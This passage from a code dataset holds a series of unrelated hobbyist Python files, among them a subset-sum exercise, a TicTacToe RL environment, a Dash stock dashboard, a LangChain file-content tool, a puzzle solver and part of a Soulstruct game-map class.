self.trainer.max_epochs\n","repo_name":"priyanshusankhala/VisionLanguageExplainabilit","sub_path":"vision_language_models/ALBEF/models/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5865578165","text":"from functools import lru_cache\nimport random\n# Given a set of positive numbers, determine if there exists a\n# subset whose sum is equal to a given number ‘S’.\n\ncallCount = 0\nmaxDepth = 0\n\n\ndef subsetSumBruteForce(nums, S, depth): # O (2 ^ (n + 1) - 1)\n # print(\" \" * depth, nums, S)\n # global callCount\n # callCount += 1\n # global maxDepth\n # maxDepth = max(maxDepth, depth)\n if len(nums) == 0:\n return S == 0\n choice1 = False\n if nums[0] <= S:\n choice1 = subsetSumBruteForce(nums[1:], S - nums[0], depth + 1)\n choice2 = subsetSumBruteForce(nums[1:], S, depth + 1)\n return choice1 or choice2\n\n\nnums = [random.randint(0, 10) for _ in range(10)]\nS = random.randint(0, 35)\nprint(nums, S, subsetSumBruteForce(nums, S, depth=0))\n# for i in range(1, 15):\n# callCount = 0\n# nums = [random.randint(0, 10) for _ in range(i)]\n# S = random.randint(0, 10 * i)\n# subsetSumBruteForce(nums, S, 0)\n# print(i, callCount)\n\n\n@lru_cache(1000)\ndef subsetSumTopDown(index, S):\n global callCount\n callCount += 1\n if index == len(nums):\n return S == 0\n choice1 = False\n if(nums[index] <= S):\n choice1 = subsetSumTopDown(index + 1, S - nums[index])\n if(choice1):\n return True\n choice2 = subsetSumTopDown(index + 1, S)\n return choice1 or choice2\n\n\nfor i in range(1, 15):\n callCount = 0\n nums = [random.randint(0, 10) for _ in range(i)]\n S = random.randint(0, 10 * i)\n subsetSumTopDown(0, S)\n print(i, callCount)\n","repo_name":"AnshulYADAV007/weCohort4DSA","sub_path":"Dynamic Programming/0-1 Knapsack/subset-sum.py","file_name":"subset-sum.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"5542057241","text":"import numpy as np\nfrom drl_sample_project_python.drl_lib.do_not_touch.contracts import SingleAgentEnv\n\n\nclass TicTacToe(SingleAgentEnv):\n def __init__(self, reward_win, reward_draw, reward_lose):\n self.board = np.full(9,3)\n self.cell_arr = np.arange(9)\n\n self.user_num = 0\n self.comp_num = 1\n self.nex_player = 0\n\n self.current_score = 0.0\n\n self.game_over = False\n\n self.reward_win = reward_win\n self.reward_draw = reward_draw\n self.reward_lose = reward_lose\n\n self.winner=3\n\n def is_game_over(self):\n return self.game_over\n\n def is_win(self) -> bool:\n return self.score() == 10\n\n def is_loss(self) -> bool:\n return self.score() < 0\n\n def is_draw(self) -> bool:\n return self.score() == 1\n\n def state_id(self) -> int:\n return self.board\n\n def score(self) -> float:\n return self.current_score\n\n def reset(self):\n self.board = np.full(9,3)\n self.nex_player = np.random.randint(0, 2)\n # self.nex_player = 0\n if self.nex_player == self.comp_num:\n open_slots = self.available_actions_ids()\n comp_input = np.random.choice(open_slots)\n self.place_letter(comp_input, self.comp_num)\n self.game_over = False\n self.current_score = 0.0\n self.winner = 3\n\n def available_actions_ids(self) -> np.ndarray:\n return np.where(self.board == 3)[0]\n\n def act_with_action_id(self,action_id):\n self.place_letter(action_id, self.user_num)\n if self.check_if_win(self.user_num) :\n return\n\n open_slots = self.available_actions_ids()\n comp_input = np.random.choice(open_slots)\n self.place_letter(comp_input, self.comp_num)\n\n if self.check_if_win(self.comp_num) :\n return\n\n def check_if_win(self, last_player):\n for i in range(0, 3):\n # Checks rows and columns for match\n rows_win = (self.board.reshape(3,3)[i ,:] == last_player).all()\n cols_win = (self.board.reshape(3,3)[:, i] == last_player).all()\n if rows_win or cols_win:\n return self.finish_game(last_player)\n\n diag1_win = (np.diag(self.board.reshape(3,3)) == last_player).all()\n diag2_win = (np.diag(np.fliplr(self.board.reshape(3,3))) == last_player).all()\n\n if diag1_win or diag2_win:\n return self.finish_game(last_player)\n\n if len(self.available_actions_ids()) == 0:\n return self.finish_game(3)\n\n def finish_game(self, last_player):\n if last_player == self.user_num:\n self.current_score += self.reward_win\n self.winner=0\n # print(\"finish win\")\n elif last_player == self.comp_num:\n self.current_score += self.reward_lose\n # print(\"finish lose\")\n self.winner=1\n else :\n self.current_score += self.reward_draw\n self.winner = 2\n # print(\"finish draw\")\n # print(self.board.reshape(3,3))\n\n self.game_over = True\n return 2\n\n def place_letter(self, current_input, current_num):\n self.board[current_input] = current_num\n\n","repo_name":"agranger13/ReinforcementLearning_Cours","sub_path":"drl_sample_project_python/drl_lib/to_do/environment/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"338107082","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Mon Jun 15 22:34:04 2020\n\n@author: Alukard\n'''\n\nimport random\nimport json\n\nusers = ['Alukard', 'JDRoldan', 'Zulu-bot']\nservices = ['Energy', 'Water', 'Gas']\n\nfor user in users:\n ''' Set median values for each service '''\n energyMedian = 10\n waterMedian = 50\n gasMedian = 30\n\n for service in services:\n ''' Open doc to write on '''\n docName = '{}-{}'.format(service, user)\n doc = open('{}.json'.format(docName), 'w')\n doc.write(\"[\\n\")\n\n ''' Determine tags for each data set '''\n # userId\n if user == users[0]:\n userTag = '5edd6f1023651b46d83a03c1'\n elif user == users[1]:\n userTag = '5edd6f6923651b46d83a03c2'\n elif user == users[2]:\n userTag = '5edd6fb123651b46d83a03c3'\n \n # Service tag\n if service == services[0]:\n serviceTag = 'E'\n elif service == services[1]:\n serviceTag = 'W'\n elif service == services[2]:\n serviceTag = 'G'\n\n # aptId / aptTag\n if user == users[0]:\n tower = 'A'\n aptTag = '101'\n elif user == users[1]:\n tower = 'B'\n aptTag = '101'\n elif user == users[2]:\n tower = 'C'\n aptTag = '101'\n\n ''' Generate random data '''\n for min in range(0,60,1):\n ''' Set values around the median for each service '''\n if service == services[0]:\n sendData = energyMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 100:\n sendData -= random.uniform(0,1)\n energyMedian = sendData\n elif service == services[1]: \n sendData = waterMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 100:\n sendData -= random.uniform(0,1)\n waterMedian = sendData\n elif service == services[2]:\n sendData = gasMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 100:\n sendData -= random.uniform(0,1)\n gasMedian = sendData\n \n \n\n data = json.dumps(\n {'userId': '{}'.format(userTag),\n 'sensorId': '{}-{}-{}'.format(serviceTag, tower, aptTag),\n 'aptId': 'T{}-{}'.format(tower, aptTag),\n 'type': '{}'.format(service),\n 'dateTime': '2020-02-02T02:{:02d}:00'.format(min),\n 'data': round(sendData, 4),\n 'status': True\n })\n if min != 59: \n doc.write(\"\\t{},\\n\".format(data))\n else:\n doc.write(\"\\t{}\\n]\".format(data))\n \n ''' Close doc '''\n doc.close()","repo_name":"AlukardSins/houtsy-app","sub_path":"Dataset Houtsy/JSON Generator.py","file_name":"JSON Generator.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26035270887","text":"import pygame\n\nimport obj\n\nclass Button:\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.size_x = size_x\n\t\tself.size_y = size_y\n\t\tself.color = color\n\t\tself.true_color = color\n\n\t\tself.old_pressed = (0, 0, 0)\n\n\tdef render(self, win):\n\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.size_x, self.size_y))\n\n\tdef tick(self):\n\t\tx, y = self.x, self.y\n\t\tsx, sy = self.size_x, self.size_y\n\t\tmp = pygame.mouse.get_pos()\n\n\t\tif mp[0] >= x and mp[0] <= x + sx and mp[1] >= y and mp[1] <= y + sy:\n\t\t\tr, g, b = self.true_color\n\t\t\tself.color = (min(r + 50, 255), min(g + 50, 255), min(b + 50, 255))\n\n\t\t\tpressed = pygame.mouse.get_pressed()\n\t\t\tif pressed[0] and not self.old_pressed[0]:\n\t\t\t\tself.on_click(0)\n\t\t\tif pressed[1] and not self.old_pressed[1]:\n\t\t\t\tself.on_click(1)\n\t\t\tif pressed[2] and not self.old_pressed[2]:\n\t\t\t\tself.on_click(2)\n\t\t\tself.old_pressed = pressed\n\t\telse:\n\t\t\tself.color = self.true_color\n\n\tdef on_click(self, button): # 0 - left | 2 - right | 1 - middle\n\t\tpass\n\nclass CreateObjectButton(Button):\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple, window_size : tuple):\n\t\tsuper().__init__(x, y, size_x, size_y, color)\n\n\t\tself.window_size = window_size\n\n\tdef on_click(self, button):\n\t\tobj.add_obj(obj.Obj(self.window_size[0] // 2, self.window_size[1] // 2, \"gate\"))\n\nclass ObjectContextButton(Button):\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple, window_size : tuple):\n\t\tsuper().__init__(x, y, size_x, size_y, color)\n\n\t\tself.window_size = window_size\n\n\tdef on_click(self, button):\n\t\tobj.add_obj(obj.Obj(self.window_size[0] // 2, self.window_size[1] // 2, \"gate\"))\n","repo_name":"Myr-13/ScrapSchematicTool","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24401948529","text":"n=0\nwhile n<5:\n try:\n s=eval(input(\"请输入你的银行卡密码:\"))\n break\n except:\n while n<4:\n n=n+1\n print(\"密码输入有误!所剩余次数还有{}次,请重新输入:\".format(5-n),end=\"\")\n try:\n s=eval(input())\n break\n except:\n continue\n break\nif n<4:\n print(\"输入密码确认无误,开始读卡!\")\nelse:\n print(\"密码输入剩余次数为0,不可再次输入\")\n","repo_name":"Yanjy2019/control-structure-and-function","sub_path":"银行卡输入密码次数限制python实现.py","file_name":"银行卡输入密码次数限制python实现.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1006284087","text":"#!/usr/bin/python\n\nimport webapp2\nimport logging\nimport person\nimport jinja2\nimport os\n\njinja_environment = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\n\nclass MainPage(webapp2.RequestHandler):\n\n def get(self):\n logging.info(\"This is some log\")\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render({}))\n\n def post(self):\n p = person.Person(key_name=self.request.get(\"cedula\"),\n cedula=self.request.get(\"cedula\"),\n first_name=self.request.get(\"first_name\"))\n p.put()\n\napp = webapp2.WSGIApplication([('/', MainPage), ('/cedula/insert', MainPage)],\n debug=True)\n\n","repo_name":"ipince/venezuelan-elections-oct-2012","sub_path":"tucedula/tucedula.py","file_name":"tucedula.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22427951139","text":"\nimport json\nfrom typing import List, Optional\n\nfrom langchain.callbacks.manager import CallbackManagerForToolRun\nfrom langchain.tools import BaseTool\n\nfrom codelearn.project.project import Project\nfrom codelearn.utils.file_util import process_file_paths\n\n\nclass FileContentViewTool(BaseTool):\n \"\"\"Tool to fetch and display detailed content of project files.\"\"\"\n\n name: str = \"get_file_content\"\n description: str = (\n \"The 'get_file_content' tool fetches and displays detailed content of specified files within the project, including both source code and documentation. It's an important tool for users who need detailed from code source.\"\n \"Input a comma-separated list of file names (without folder or path names) to view. Incomplete paths are not accepted. For example swim-main/src/example.txt is a full path file, but 'src/example' is incomplete directory folder not allowed\"\n \"Output is a dictionary with 'files' key containing a list of dictionaries for each file, \"\n \"**Ensure you've requested the repository structure before asking for file contents.The requested file must exist in the project**\"\n \"Useful for users diving deep into a project's codebase or documentation to understand its intricacies.\"\n )\n project: Project\n\n def _get_file_content(self, paths: List[str]) -> dict:\n file_tree = self.project.contents\n files = []\n for path in paths:\n file_content = file_tree.get_file_content(path)\n files.append({\n \"path\": path,\n \"content\": file_content,\n \"isValid\": True if file_content else False\n })\n return json.dumps({\n \"files\": files,\n \"ToolHint\": (\n \"You now have the content of the requested files. **then you need answer user question baied on content file**\\n\"\n \"Before answering, ensure you have enough context by considering the relevance of your response to the user's question. \"\n \"Calculate the relevance score, and if it falls below 0.7, request additional files. Repeat until the score is satisfactory.\\n\"\n \"**If you lack sufficient context to answer, continue exploring using this or other tools.**\"\n )\n })\n\n def _run(\n self,\n file_paths: str\n ) -> dict:\n \"\"\"Use the tool.\"\"\"\n paths = process_file_paths(file_paths)\n print(f\"use FileContentViewTool: {paths}\\n\")\n return self._get_file_content(paths)","repo_name":"FISHers6/CodeLearn-Agent","sub_path":"codelearn/tools/file_content_view.py","file_name":"file_content_view.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24380409629","text":"try:\n\tfrom setuptools import setup\nexcept ImportError:\n\tfrom distutils.core import setup\n\nconfig = {\n\t'description' : 'SMS Send/Receive',\n\t'author' : 'Wendell Philip B. Saligan',\n\t'url' : 'https://github.com/wends155/modem',\n\t'download_url' : 'https://github.com/wends155/modem',\n\t'author_email' : 'saliganw@gmail.com',\n\t'version' : '0.1',\n\t'install_requires' : ['pyhumod'],\n\t'packages' : ['modem'],\n\t'scripts' : [],\n\t'name' : 'modem'\n}\n\nsetup(**config)\n","repo_name":"wends155/modem","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1581390015","text":"\"\"\"\nSample implementation of map reduce algorithm in python.\nMapReduce is an algorithm (or more correctly defined as programming model)\nwhich implements both map and reduce functions to do distributed data\nprocessing.\nWe will tokenize and count words\n\"\"\"\n\n\ntext1 = ['I love computer, but computer does not love me.']\ntext2 = ['I like margarita.', 'He does not like Gin.']\n\nprint(\" ** Method 1: Using list of implement MapReduce.\")\n# Map\n# Map is a processing task that takes in certain input and turn it into\n# a key-value pair as an output. In this example we will take in a sentence\n# as an input and turn it into a key-value word-count pair\n\ndef mapping(text):\n # In context of text analysis, mapping is done by first tokenizing\n # words in a sentence.\n\n # Before everything else, cleaning has to be done\n # lowercasing\n text = [s.lower() for s in text]\n # remove punctuation\n punct = set(['.'])\n # text = ''.join([s for s in text if s not in punct])\n text = [s.replace('.','').replace(',','') for s in text]\n\n # now tokenizing. turn a sentence into list of words\n text = [t.split(' ') for t in text]\n\n # flatten it\n text = [item for sublist in text for item in sublist]\n return text\n\n# Reduce\n# Reduce is a processing task that takes in key-value pairs input and \n# reducing the number of the pairs by aggregating them. The output is the\n# list of sum of values.\n\ndef reducing(wordlist):\n # now that we got list of words, we count the overall occurences\n wordlist = [[word, wordlist.count(word)] for word in set(wordlist)]\n return wordlist\n\n\n# words = mapping(text2)\n# print(words)\n# wordcount = reducing(words)\n# print(wordcount)\n\n\nprint(\" ** Method 2: Using dict of implement MapReduce.\")\n\ndef mapping2(text):\n # In context of text analysis, mapping is done by first tokenizing\n # words in a sentence.\n\n # Before everything else, cleaning has to be done\n # lowercasing\n text = [s.lower() for s in text]\n # remove punctuation\n punct = set(['.'])\n # text = ''.join([s for s in text if s not in punct])\n text = [s.replace('.','').replace(',','') for s in text]\n\n # now tokenizing. turn a sentence into list of words\n text = [t.split(' ') for t in text]\n\n # flatten it\n text = [[item,1] for sublist in text for item in sublist]\n\n # add count:\n return text\n\n\ndef reducing2(keyvalue):\n # now that we got list of words, we count the overall occurences\n wordcount = {}\n for item in keyvalue:\n # add key to dict if it's not already there\n # if it's there, add 1\n wordcount[item[0]] = wordcount.get(item[0], 0) + 1\n \n return wordcount\n\nwords = mapping2(text1)\nprint(words)\nwordcount = reducing2(words)\nprint(wordcount)\n","repo_name":"maximillianus/python-scripts","sub_path":"mapreduce/mapreduce2.py","file_name":"mapreduce2.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71046074028","text":"# Perform imports here:\nimport plotly.graph_objs as go\nimport numpy as np\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nfrom datetime import datetime as dt\nfrom datetime import datetime\nimport pandas_datareader.data as web\nimport os\nimport json\n\n########################################################################################################\n# Specify Your IEX API Token here\nos.environ[\"IEX_API_KEY\"] = \"\"\n########################################################################################################\n\ndf = pd.read_csv(\"./data/NASDAQcompanylist.csv\")\noption_dict = [{'label': i, 'value': i} for i in df['Name'].unique()]\n\n# Launch the application:\napp = dash.Dash()\n\n# Create a Dash layout that contains input components\n# and at least one output. Assign IDs to each component:\napp.layout = html.Div([\n html.Div(\"Stock Ticker Dashboard\",\n style={\"fontSize\":\"30\", \"marginLeft\":\"10px\"}),\n html.Label(\"Select Stock symbles\", style={'width': '30%', 'display': 'inline-block'}),\n html.Label(\"Select Start and End date\", style={'width':' 40%', 'display': 'inline-block'}),\n html.Div(),\n html.Div(\n dcc.Dropdown(id='my_company',\n options=option_dict,\n multi=True,\n value=[]),\n style={'width': '30%', 'display': 'inline-block'}),\n html.Div(dcc.DatePickerRange(id='my_date_picker',\n min_date_allowed=datetime(2015, 1, 1),\n max_date_allowed=datetime.today(),\n start_date=datetime(2018, 1, 1),\n end_date=datetime.today()),\n style={'width': '40%', 'display': 'inline-block'}),\n html.Div(html.Button(id='submit_button', n_clicks=0, children='Submit'),\n style={'width': '30%', 'display': 'inline-block'}),\n html.Div(),\n dcc.Graph(id='result_plot',\n figure={'data': go.Scatter(),\n 'layout': go.Layout(hovermode=\"closest\", title=\"my_plot\")}),\n html.Markdown(id=\"my_explanation\", children=\"\"),\n])\n\n\n# Create a Dash callback:\n@app.callback(Output('result_plot', 'figure'),\n [Input('submit_button', 'n_clicks')],\n [State('my_company', 'value'),\n State('my_date_picker', 'start_date'),\n State('my_date_picker', 'end_date')])\ndef update_figure(n_clicks, companies, start_date, end_date):\n\n traces =[]\n for i in companies:\n df = web.DataReader(i, 'iex', start_date, end_date, access_key=os.environ[\"IEX_API_KEY\"])\n traces.append({'x':df.index, 'y': df.close, 'name':i})\n\n fig = {\n 'data': traces,\n 'layout': {'title': ', '.join(companies) + ' Closing Prices'}\n }\n return fig\n\n@app.callback(Output('my_explanation', 'children'),\n [Input('result_plot', 'clickData')])\ndef update_figure2(selected_data):\n my_json_comment = json.dump(selected_data)\n\n comment = \"\"\n for i in range(my_json_comment[\"points\"]):\n comment += \"the index for {} is in {} \\n\".format(my_json_comment[\"points\"][i]['traces'],\n my_json_comment[\"points\"][i]['y'])\n\n return comment\n\n# Add the server clause:\napp.run_server()\n","repo_name":"chenpoi/CodeExample","sub_path":"PythonExample/Stock_price_visualization_task.py","file_name":"Stock_price_visualization_task.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36631280327","text":"#!/usr/bin/python\n\nfrom PIL import Image\nfrom layers.Space import Space\nimport layers\n\nWIDTH = 1920\nHEIGHT = 1080\nZOOM = 100\nSEED = 96\nRENDER_PER_STEP = False\nRENDER_PER_LAYER = False\nBACKGROUND = 'black'\nMAX_LAYERS = None\nSHOW = False\n\nfrom optparse import OptionParser\nparser = OptionParser()\nparser.add_option(\"-W\", \"--width\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"width\", default=WIDTH,\n help=\"Width of image\")\nparser.add_option(\"-H\", \"--height\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"height\", default=HEIGHT,\n help=\"Height of image\")\nparser.add_option(\"-z\", \"--zoom\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"zoom\", default=ZOOM,\n help=\"Zoom represents diameter of largest planet in pixels\")\nparser.add_option(\"-s\", \"--seed\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"seed\", default=SEED,\n help=\"Seed used to generate image\")\nparser.add_option('-S', \"--steps\",\n action=\"store_true\", dest=\"steps\", default=False,\n help=\"Render each step separately\")\nparser.add_option('-L', \"--layers\",\n action=\"store_true\", dest=\"layers\", default=False,\n help=\"Render each layer separately\")\nparser.add_option(\"-t\", \"--temporary\",\n action=\"store_true\", dest=\"temporary\", default=False,\n help=\"Store image result in temporary file and display result.\")\noptions, optionsValues = parser.parse_args()\n\nWIDTH = options.width\nHEIGHT = options.height\nZOOM = options.zoom\nSEED = options.seed\nRENDER_PER_STEP = options.steps\nRENDER_PER_LAYER = options.layers\nSHOW = options.temporary\n\nimport random\nrandom.seed(SEED)\n\nusedLayers = [layers.LayerPlanets(), layers.LayerPlanetsSelection(), layers.LayerPlanetsTerrain(), layers.LayerPlanetsTrees(), layers.LayerPlanetsLife()]\n\nim = Image.new(\"RGB\", (WIDTH, HEIGHT), BACKGROUND)\nspace = Space(SEED)\n\ndef saveImage(image, steps, layers):\n if SHOW:\n image.show()\n else:\n name = \"out\"\n if steps != None:\n name += \"-s\" + str(steps)\n if layers != None:\n name += \"-l\" + str(layers)\n name += \".png\"\n image.save(name, 'PNG')\n print(\"Image saved as \" + name)\n\nfor layer in usedLayers:\n layer.init(space)\n\n#\n# GENERATE LAYERS\n#\nrequiredLayersCount = 0\nfor layer in usedLayers:\n if layer.get_min_zoom() <= ZOOM:\n requiredLayersCount += 1\n\nif MAX_LAYERS and requiredLayersCount > MAX_LAYERS:\n requiredLayersCount = MAX_LAYERS\n\nallSuccess = False\nsize = 0\nwhile not allSuccess:\n allSuccess = True\n size += 1\n for layerIndex in range(0, requiredLayersCount):\n layer = usedLayers[layerIndex]\n for x in range(-1 * size, size):\n for y in range(-1 * size, size):\n layer.generate(space, x, y, random.random)\n\n w = int(WIDTH / 2 / ZOOM) + 1\n h = int(HEIGHT / 2 / ZOOM) + 1\n for x in range(-1 * w, w):\n for y in range(-1 * h, h):\n if space.getBlockLayer(x, y) < requiredLayersCount:\n allSuccess = False\n\n #\n # RENER LAYERS\n #\n def transition(coords):\n scalar = type(coords) not in (tuple, list)\n if scalar:\n coords = (coords,)\n scalar = True\n #zoom\n coords = [x * ZOOM for x in coords]\n\n #offset\n if len(coords) == 2:\n coords[0] += WIDTH / 2\n coords[1] += HEIGHT / 2\n\n #round\n coords = [int(x) for x in coords]\n\n if scalar:\n return coords[0]\n else:\n return coords\n\n if RENDER_PER_STEP:\n im.paste(BACKGROUND, (0, 0, WIDTH, HEIGHT))\n li = 0\n for layer in usedLayers:\n layer.render(space, im, transition)\n if RENDER_PER_LAYER:\n saveImage(im, size, li)\n li += 1\n if not RENDER_PER_LAYER:\n saveImage(im, size, None)\n\nif not RENDER_PER_STEP:\n li = 0\n for layer in usedLayers:\n layer.render(space, im, transition)\n if RENDER_PER_LAYER:\n saveImage(im, None, li)\n li += 1\n if not RENDER_PER_LAYER:\n saveImage(im, None, None)\n","repo_name":"dee-gmiterko/py-2050","sub_path":"2050.py","file_name":"2050.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23613767695","text":"import random\n\nMAP_WIDTH = 20\n\ndef make_map(level):\n height = len(level)\n width = len(level[0])\n\n m = {}\n m['devices_remaining'] = 0\n m['path'] = []\n m['device_path'] = []\n m['teleporters'] = []\n data = m['data'] = {}\n\n for yIndex, yLevel in enumerate(level):\n y = height - yIndex - 1\n for x, xLevel in enumerate(yLevel):\n coord = (x, y)\n if xLevel == '*':\n m['player'] = coord\n data[coord] = '_'\n elif xLevel == '_' or xLevel == ' ':\n data[coord] = xLevel\n elif xLevel == 'E':\n data[coord] = xLevel\n m['teleporters'].append(coord)\n m['devices_remaining'] += 1\n else:\n data[coord] = xLevel\n m['devices_remaining'] += 1\n \n\n return m\n \ndef _copy(g):\n return {\n 'player' : g['player'],\n 'data' : g['data'].copy(),\n 'devices_remaining' : g['devices_remaining'],\n 'path' : g['path'][:],\n 'device_path' : g['device_path'][:],\n 'teleporters' : g['teleporters'][:],\n }\n\ndef _handle_effect(g, dest):\n data = g['data']\n\n while True:\n tile = data[dest]\n \n if tile == '_':\n break\n elif tile == ' ':\n dest = dest[0], dest[1] - 1\n else:\n g['device_path'].append(dest)\n if tile == 'S':\n g['devices_remaining'] -= 1\n data[dest] = '_'\n if g['facing'] == 'left':\n dest = dest[0] - 1, dest[1] + 2\n else:\n dest = dest[0] + 1, dest[1] + 2\n elif tile == 'R':\n g['devices_remaining'] -= 1\n data[dest] = ' '\n if g['facing'] == 'left':\n dest = dest[0] - 1, dest[1]\n else:\n dest = dest[0] + 1, dest[1]\n elif tile == 'T':\n g['devices_remaining'] -= 1\n data[dest] = '_'\n dest = dest[0], dest[1] - 1\n elif tile == 'E':\n g['devices_remaining'] -= 2\n newDest = [x for x in g['teleporters'] if x != dest][0]\n data[dest] = '_'\n data[newDest] = '_'\n dest = newDest\n\n g['player'] = dest\n g['path'].append('Effect to {0}'.format(dest))\n return g\n\ndef _move_left(g):\n data = g['data']\n playerX = g['player'][0]\n playerY = g['player'][1]\n g['facing'] = 'left'\n\n newX = playerX\n while newX > 1:\n newX -= 1\n dest = (newX, playerY)\n if data[dest] != '_':\n g['path'].append('left to {0}'.format(dest))\n return _handle_effect(g, dest)\n\n return None\n\ndef _move_right(g):\n data = g['data']\n playerX = g['player'][0]\n playerY = g['player'][1]\n g['facing'] = 'right'\n\n newX = playerX\n while newX < MAP_WIDTH - 1:\n newX += 1\n dest = (newX, playerY)\n if data[dest] != '_':\n g['path'].append('right to {0}'.format(dest))\n return _handle_effect(g, dest)\n\n return None\n\ndef solve(g):\n if g['devices_remaining'] == 0:\n return [g['device_path']], []\n\n winning_solutions = []\n losing_solutions = []\n\n leftG = _move_left(_copy(g))\n rightG = _move_right(_copy(g))\n\n if leftG:\n w, l = solve(leftG)\n winning_solutions += w\n losing_solutions += l\n\n if rightG:\n w, l = solve(rightG)\n winning_solutions += w\n losing_solutions += l\n\n if len(winning_solutions) == 0:\n losing_solutions += [g['device_path']]\n return winning_solutions, losing_solutions\n\n \ndef prune_paths(win_paths, loss_paths):\n real_losses = []\n\n for loss_path in loss_paths:\n found_match = False\n for win_path in win_paths:\n if win_path[:len(loss_path)] == loss_path:\n found_match = True\n break\n\n if not found_match:\n real_losses.append(loss_path)\n\n # Remove duplicate win scenarios\n real_wins = list(set([tuple(x) for x in win_paths]))\n # Remove duplicate loss scenarios\n real_losses = list(set([tuple(x) for x in real_losses]))\n\n # Now go through losses that are really just the start\n # to other losses and remove those\n real_losses_2 = []\n\n for loss_path1 in real_losses:\n found_parent = False\n for loss_path2 in real_losses:\n if loss_path1 == loss_path2:\n continue\n\n if loss_path1[:len(loss_path2)] == loss_path2:\n found_parent = True\n break\n\n if not found_parent:\n real_losses_2.append(loss_path1)\n\n return real_wins, real_losses_2\n \n\ndef create_random(m):\n results = []\n for yIndex, y in enumerate(m):\n result = ''\n for xIndex, x in enumerate(y):\n if x == '?':\n result = result + random.choice(['R', 'T', 'S'])\n else:\n result = result + x\n results.append(result)\n\n \n return results\n","repo_name":"markhildreth/ld26-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120768620","text":"from __future__ import annotations\n\n__all__ = [\n \"Map\",\n \"MapEntry\",\n \"MapEntity\",\n \"MapTyping\",\n]\n\nimport typing as tp\nfrom enum import IntEnum, unique\n\nfrom .basic_types import BaseGameObject\n\n\nclass Map(BaseGameObject):\n def __init__(\n self,\n area_id: tp.Optional[int],\n block_id: tp.Optional[int],\n cc_id: tp.Optional[int] = 0,\n dd_id: tp.Optional[int] = 0,\n name=None,\n emevd_file_stem=None,\n msb_file_stem=None,\n ai_file_stem=None,\n esd_file_stem=None,\n ffxbnd_file_name=None,\n variable_name=None,\n verbose_name=None,\n ):\n \"\"\"\n Create a game map instance with associated naming information. These instances can be used as arguments in EVS\n instructions.\n\n Soulstruct defines constants for existing game maps already, so you shouldn't need to use this class yourself.\n (You can theoretically use transient `Map(a, b)` calls as arguments in EVS instructions, but you may as well\n just use a tuple `(a, b)` in that case, which is also accepted.)\n\n Args:\n area_id: Area ID of map, which is the first number (of four) in the full map ID. Multiple maps can appear in\n the same area. Some game files (such as lighting parameters) are area-specific rather than map-specific.\n block_id: Block ID of map, which is the second number (of four) in the full map ID. Generally, the area ID\n and block ID fully specify the map. The third number in the map ID is essentially never used and the\n fourth number is only used for file revision purposes (e.g. the Dark Souls DLC version of Darkroot).\n cc_id: Third part of map ID, used only in later games with lots of maps.\n dd_id: Fourth and final part of map ID, used only in later games with lots of maps.\n\n name: Canonical name of map (e.g. \"undeadburg\"). Note that the map-finding utility `get_map` ignores case\n and underscores when looking for a specific name.\n\n emevd_file_stem: Name of `emevd` file for this map, without extension.\n msb_file_stem: Name of `msb` file for this map, without extension.\n ai_file_stem: Name of 'luabnd[.dcx]' for this map, without extension(s).\n esd_file_stem: Name of 'talkesdbnd[.dcx]' for this map, without extension(s).\n\n ffxbnd_file_name: Name of 'ffxbnd[.dcx]' file that Soulstruct should modify for this map. Map areas with\n multiple blocks may have an area-wide file and block-specific files that are both loaded. The block-\n specific files are 